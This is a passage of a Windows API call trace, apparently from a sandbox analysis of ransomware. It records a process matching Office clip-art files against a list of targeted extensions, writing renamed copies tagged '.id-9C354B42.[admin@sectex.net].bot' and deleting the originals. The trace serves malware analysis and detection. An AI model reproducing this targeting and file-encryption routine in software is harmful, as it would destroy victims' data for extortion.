	[0163.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 63
	[0163.293] lstrlenW (lpString=".1cd") returned 4
	[0163.293] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 63
	[0163.293] lstrlenW (lpString=".jpg") returned 4
	[0163.293] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 63
	[0163.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 63
	[0163.293] lstrlenW (lpString=".doc") returned 4
	[0163.293] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.293] lstrlenW (lpString=".docx") returned 5
	[0163.293] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0163.293] lstrlenW (lpString=".pdf") returned 4
	[0163.293] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.293] lstrlenW (lpString=".xls") returned 4
	[0163.293] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.293] lstrlenW (lpString=".xlsx") returned 5
	[0163.293] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0163.293] lstrlenW (lpString=".ppt") returned 4
	[0163.293] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 63
	[0163.293] lstrlenW (lpString=".zip") returned 4
	[0163.293] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.293] lstrlenW (lpString=".rar") returned 4
	[0163.293] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.293] lstrlenW (lpString=".bz2") returned 4
	[0163.293] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.293] lstrlenW (lpString=".7z") returned 3
	[0163.293] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 63
	[0163.294] lstrlenW (lpString=".dbf") returned 4
	[0163.294] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 63
	[0163.294] lstrlenW (lpString=".1cd") returned 4
	[0163.294] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 63
	[0163.294] lstrlenW (lpString=".jpg") returned 4
	[0163.294] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.294] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0163.294] lstrlenW (lpString="J0145707.JPG") returned 12
	[0163.294] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145707.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0163.295] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=36820) returned 1
	[0163.295] CloseHandle (hObject=0x398) returned 1
	[0163.295] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145707.jpg")) returned 0x20
	[0163.295] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145707.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.295] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145707.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0163.295] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.295] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.295] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145707.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0163.296] GetLastError () returned 0x0
	[0163.296] ReadFile (in: hFile=0x398, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x8fd4, lpOverlapped=0x0) returned 1
	[0163.298] WriteFile (in: hFile=0x3e8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x8fe0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x8fe0, lpOverlapped=0x0) returned 1
	[0163.299] ReadFile (in: hFile=0x398, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.299] WriteFile (in: hFile=0x3e8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.300] SetEndOfFile (hFile=0x3e8) returned 1
	[0163.300] CloseHandle (hObject=0x3e8) returned 1
	[0163.300] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.300] SetEndOfFile (hFile=0x398) returned 1
	[0163.302] CloseHandle (hObject=0x398) returned 1
	[0163.302] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.302] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145707.jpg")) returned 1
	[0163.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG") returned 63
	[0163.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG") returned 63
	[0163.303] lstrlenW (lpString=".doc") returned 4
	[0163.303] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.303] lstrlenW (lpString=".docx") returned 5
	[0163.303] lstrcmpiW (lpString1=".docx", lpString2="7.JPG") returned -1
	[0163.303] lstrlenW (lpString=".pdf") returned 4
	[0163.303] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.303] lstrlenW (lpString=".xls") returned 4
	[0163.303] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.303] lstrlenW (lpString=".xlsx") returned 5
	[0163.303] lstrcmpiW (lpString1=".xlsx", lpString2="7.JPG") returned -1
	[0163.303] lstrlenW (lpString=".ppt") returned 4
	[0163.303] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG") returned 63
	[0163.304] lstrlenW (lpString=".zip") returned 4
	[0163.304] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.304] lstrlenW (lpString=".rar") returned 4
	[0163.304] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.304] lstrlenW (lpString=".bz2") returned 4
	[0163.304] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.304] lstrlenW (lpString=".7z") returned 3
	[0163.304] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG") returned 63
	[0163.304] lstrlenW (lpString=".dbf") returned 4
	[0163.304] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG") returned 63
	[0163.304] lstrlenW (lpString=".1cd") returned 4
	[0163.304] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG") returned 63
	[0163.304] lstrlenW (lpString=".jpg") returned 4
	[0163.304] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG") returned 63
	[0163.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG") returned 63
	[0163.304] lstrlenW (lpString=".doc") returned 4
	[0163.304] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.304] lstrlenW (lpString=".docx") returned 5
	[0163.304] lstrcmpiW (lpString1=".docx", lpString2="7.JPG") returned -1
	[0163.304] lstrlenW (lpString=".pdf") returned 4
	[0163.304] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.304] lstrlenW (lpString=".xls") returned 4
	[0163.304] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.304] lstrlenW (lpString=".xlsx") returned 5
	[0163.304] lstrcmpiW (lpString1=".xlsx", lpString2="7.JPG") returned -1
	[0163.304] lstrlenW (lpString=".ppt") returned 4
	[0163.304] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG") returned 63
	[0163.304] lstrlenW (lpString=".zip") returned 4
	[0163.304] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.304] lstrlenW (lpString=".rar") returned 4
	[0163.305] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.305] lstrlenW (lpString=".bz2") returned 4
	[0163.305] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.305] lstrlenW (lpString=".7z") returned 3
	[0163.305] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG") returned 63
	[0163.305] lstrlenW (lpString=".dbf") returned 4
	[0163.305] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG") returned 63
	[0163.305] lstrlenW (lpString=".1cd") returned 4
	[0163.305] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG") returned 63
	[0163.305] lstrlenW (lpString=".jpg") returned 4
	[0163.305] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.305] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0163.305] lstrlenW (lpString="J0145810.JPG") returned 12
	[0163.305] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145810.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0163.306] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=36792) returned 1
	[0163.306] CloseHandle (hObject=0x398) returned 1
	[0163.306] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145810.jpg")) returned 0x20
	[0163.306] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145810.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.307] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145810.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0163.307] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.307] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.307] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145810.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0163.308] GetLastError () returned 0x0
	[0163.308] ReadFile (in: hFile=0x398, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x8fb8, lpOverlapped=0x0) returned 1
	[0163.310] WriteFile (in: hFile=0x3e8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x8fc0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x8fc0, lpOverlapped=0x0) returned 1
	[0163.311] ReadFile (in: hFile=0x398, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.311] WriteFile (in: hFile=0x3e8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.311] SetEndOfFile (hFile=0x3e8) returned 1
	[0163.312] CloseHandle (hObject=0x3e8) returned 1
	[0163.312] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.312] SetEndOfFile (hFile=0x398) returned 1
	[0163.314] CloseHandle (hObject=0x398) returned 1
	[0163.314] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.314] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145810.jpg")) returned 1
	[0163.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned 63
	[0163.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned 63
	[0163.315] lstrlenW (lpString=".doc") returned 4
	[0163.315] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.315] lstrlenW (lpString=".docx") returned 5
	[0163.315] lstrcmpiW (lpString1=".docx", lpString2="0.JPG") returned -1
	[0163.315] lstrlenW (lpString=".pdf") returned 4
	[0163.315] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.315] lstrlenW (lpString=".xls") returned 4
	[0163.315] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.315] lstrlenW (lpString=".xlsx") returned 5
	[0163.315] lstrcmpiW (lpString1=".xlsx", lpString2="0.JPG") returned -1
	[0163.315] lstrlenW (lpString=".ppt") returned 4
	[0163.315] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned 63
	[0163.315] lstrlenW (lpString=".zip") returned 4
	[0163.315] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.315] lstrlenW (lpString=".rar") returned 4
	[0163.315] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.315] lstrlenW (lpString=".bz2") returned 4
	[0163.316] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.316] lstrlenW (lpString=".7z") returned 3
	[0163.316] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned 63
	[0163.316] lstrlenW (lpString=".dbf") returned 4
	[0163.316] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned 63
	[0163.316] lstrlenW (lpString=".1cd") returned 4
	[0163.316] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned 63
	[0163.316] lstrlenW (lpString=".jpg") returned 4
	[0163.316] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned 63
	[0163.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned 63
	[0163.316] lstrlenW (lpString=".doc") returned 4
	[0163.316] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.316] lstrlenW (lpString=".docx") returned 5
	[0163.316] lstrcmpiW (lpString1=".docx", lpString2="0.JPG") returned -1
	[0163.316] lstrlenW (lpString=".pdf") returned 4
	[0163.316] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.316] lstrlenW (lpString=".xls") returned 4
	[0163.316] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.316] lstrlenW (lpString=".xlsx") returned 5
	[0163.316] lstrcmpiW (lpString1=".xlsx", lpString2="0.JPG") returned -1
	[0163.316] lstrlenW (lpString=".ppt") returned 4
	[0163.316] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned 63
	[0163.316] lstrlenW (lpString=".zip") returned 4
	[0163.316] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.316] lstrlenW (lpString=".rar") returned 4
	[0163.316] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.316] lstrlenW (lpString=".bz2") returned 4
	[0163.316] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.316] lstrlenW (lpString=".7z") returned 3
	[0163.317] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned 63
	[0163.317] lstrlenW (lpString=".dbf") returned 4
	[0163.317] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned 63
	[0163.317] lstrlenW (lpString=".1cd") returned 4
	[0163.317] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned 63
	[0163.317] lstrlenW (lpString=".jpg") returned 4
	[0163.317] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.317] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0163.317] lstrlenW (lpString="J0145879.JPG") returned 12
	[0163.317] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145879.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0163.318] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=35419) returned 1
	[0163.318] CloseHandle (hObject=0x398) returned 1
	[0163.318] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145879.jpg")) returned 0x20
	[0163.318] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145879.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.318] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145879.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0163.319] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.319] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.319] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145879.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0163.320] GetLastError () returned 0x0
	[0163.320] ReadFile (in: hFile=0x398, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x8a5b, lpOverlapped=0x0) returned 1
	[0163.322] WriteFile (in: hFile=0x3e8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x8a60, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x8a60, lpOverlapped=0x0) returned 1
	[0163.324] ReadFile (in: hFile=0x398, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.324] WriteFile (in: hFile=0x3e8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.324] SetEndOfFile (hFile=0x3e8) returned 1
	[0163.324] CloseHandle (hObject=0x3e8) returned 1
	[0163.324] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.324] SetEndOfFile (hFile=0x398) returned 1
	[0163.326] CloseHandle (hObject=0x398) returned 1
	[0163.326] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.327] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145879.jpg")) returned 1
	[0163.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG") returned 63
	[0163.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG") returned 63
	[0163.327] lstrlenW (lpString=".doc") returned 4
	[0163.327] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.327] lstrlenW (lpString=".docx") returned 5
	[0163.327] lstrcmpiW (lpString1=".docx", lpString2="9.JPG") returned -1
	[0163.328] lstrlenW (lpString=".pdf") returned 4
	[0163.328] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.328] lstrlenW (lpString=".xls") returned 4
	[0163.328] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.328] lstrlenW (lpString=".xlsx") returned 5
	[0163.328] lstrcmpiW (lpString1=".xlsx", lpString2="9.JPG") returned -1
	[0163.328] lstrlenW (lpString=".ppt") returned 4
	[0163.328] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG") returned 63
	[0163.328] lstrlenW (lpString=".zip") returned 4
	[0163.328] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.328] lstrlenW (lpString=".rar") returned 4
	[0163.328] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.328] lstrlenW (lpString=".bz2") returned 4
	[0163.328] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.328] lstrlenW (lpString=".7z") returned 3
	[0163.328] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG") returned 63
	[0163.328] lstrlenW (lpString=".dbf") returned 4
	[0163.328] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG") returned 63
	[0163.328] lstrlenW (lpString=".1cd") returned 4
	[0163.328] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG") returned 63
	[0163.328] lstrlenW (lpString=".jpg") returned 4
	[0163.328] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
